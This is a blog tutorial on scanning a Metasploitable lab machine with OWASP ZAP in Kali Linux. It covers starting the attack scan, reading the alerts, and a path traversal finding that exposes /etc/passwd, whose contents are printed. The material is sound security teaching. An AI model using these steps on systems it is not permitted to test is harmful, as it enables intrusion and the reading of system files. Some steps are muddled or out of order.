Vulnerability Scans using OWASP ZAP


I am Aaditya Purani, and i am going to introduce you all and provide you some knowledge about OWASP ZAP.


Today let’s take a look at quick and easy website vulnerability checks with the OWASP Zed Attack Proxy, or “OWASP ZAP” for short.(Note : I am testing on my own Machine)

I am Using Kali Linux OS for this tutorial, OWASP ZAP is inbuilt in KALI LINUX

So i will provide you the steps according to it.

1. First click on IFCONFIG

2. Start Kali Linux, which will boot to the graphical user interface.

3. Start OWASP ZAP:

In the Kali Linux menu, you can find OWASP ZAP in the top ten security menu (If it is not there, update to the latest version of Kali):


OWASP ZAP will open to the main menu.

4. Now, simple input the Metasploitable system’s IP address ( in my case) into the ‘URL to attack’ box and select, “Attack”:


That’s it, OWASP ZAP will then begin to spider the website:


It will also list any security issues it finds and place them under the “Alerts” tab. Clicking on the tab will show the following alerts:

Owasp ZAP Alerts

Wow, that is a lot of alerts! Each folder contains different types of security issues. For this tutorial, let’s just check out the “Path Traversal” folder.

Click to expand it.

Go ahead and click on the very first alert:

Transversal Alert

On the right side you will see an explanation of the issue:

Path Traversal Vulnerable

When you open that link. you would be shown

root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh dhcp:x:101:102::/nonexistent:/bin/false syslog:x:102:103::/home/syslog:/bin/false klog:x:103:104::/home/klog:/bin/false sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash bind:x:105:113::/var/cache/bind:/bin/false postfix:x:106:115::/var/spool/postfix:/bin/false ftp:x:107:65534::/home/ftp:/bin/false postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false distccd:x:111:65534::/:/bin/false user:x:1001:1001:just a user,111,,:/home/user:/bin/bash service:x:1002:1002:,,,:/home/service:/bin/bash telnetd:x:112:120::/nonexistent:/bin/false proftpd:x:113:65534::/var/run/proftpd:/bin/false statd:x:114:65534::/var/lib/nfs:/bin/false snmp:x:115:65534::/var/lib/snmp:/bin/false

The contents of the Linux password file – Obviously not something you want displayed on your webpage!


So this is how you use OWASP ZAP for full scanning. More OWASP regarding fuzzing are coming soon


Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s